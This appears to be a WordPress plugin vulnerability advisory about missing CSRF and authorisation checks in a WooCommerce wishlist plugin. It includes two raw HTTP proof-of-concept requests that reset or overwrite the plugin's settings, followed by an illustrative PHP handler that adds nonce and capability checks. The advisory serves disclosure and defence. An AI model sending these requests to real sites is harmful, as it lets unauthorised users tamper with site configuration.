WordPress Plugin Vulnerabilities
ThemeHigh WooCommerce Wishlist and Comparison < 1.0.5 - Unauthorised AJAX call
Description
Some AJAX actions lacked proper CSRF and authorisation checks, so they could be called by unauthenticated or low-privilege users, or triggered via CSRF. This could allow attackers to, for example, reset or change the plugin's settings.
Proof of Concept
Reset arbitrary option in the plugin (v < 1.0.5)

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Connection: close

action=reset_to_default&reset=general_settings

Save General Settings (v < 1.0.3)

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
Connection: close

action=save_general_settings&wishlist_page=&ajax_loading=false&require_login=false&wishlnk_myaccont=false&remove_pdct=true&chckut_redrct=false&success_notice=false

Other actions were possible
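For comparison, a handler for the reset_to_default action that performs both missing checks. This is an added example, not the plugin's own code or its actual patch: the function name, the 'thx_settings' nonce action, the 'thx-admin' script handle, the option name and the choice of the manage_options capability are all assumptions.

```php
<?php
// Added example. Hypothetical names: thx_reset_to_default(), 'thx_settings',
// 'thx-admin', 'thx_general_settings'. Only the action and 'reset' parameter
// names come from the requests shown above.

// Register the authenticated hook only. Without a matching
// wp_ajax_nopriv_reset_to_default hook, logged-out requests to
// admin-ajax.php never reach the handler.
add_action( 'wp_ajax_reset_to_default', 'thx_reset_to_default' );

function thx_reset_to_default() {
    // CSRF check: the request must carry a valid nonce in the 'nonce' field.
    // Passing false as the third argument makes the function return false
    // instead of dying, so a JSON error can be sent.
    if ( ! check_ajax_referer( 'thx_settings', 'nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid nonce' ), 403 );
    }

    // Authorisation check: being logged in is not enough (subscribers are
    // logged in too); require a settings-level capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // Allow-list the section to reset rather than trusting the parameter.
    $sections = array(
        'general_settings' => 'thx_general_settings', // hypothetical option name
    );
    $section = isset( $_POST['reset'] )
        ? sanitize_key( wp_unslash( $_POST['reset'] ) )
        : '';
    if ( ! isset( $sections[ $section ] ) ) {
        wp_send_json_error( array( 'message' => 'Unknown section' ), 400 );
    }

    delete_option( $sections[ $section ] );
    wp_send_json_success();
}

// The settings page passes the nonce to its script so legitimate requests
// can include it. 'thx-admin' must be a script the plugin has enqueued.
add_action( 'admin_enqueue_scripts', function () {
    wp_localize_script( 'thx-admin', 'thxAjax', array(
        'nonce' => wp_create_nonce( 'thx_settings' ),
    ) );
} );
```

With these checks in place, the first request above fails at the nonce check because it carries no nonce field, and a low-privilege user who obtains a nonce still fails the capability check.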
Affects Plugins
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScanTeam
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-05-08
Added
2021-05-08
Last Updated
2021-05-08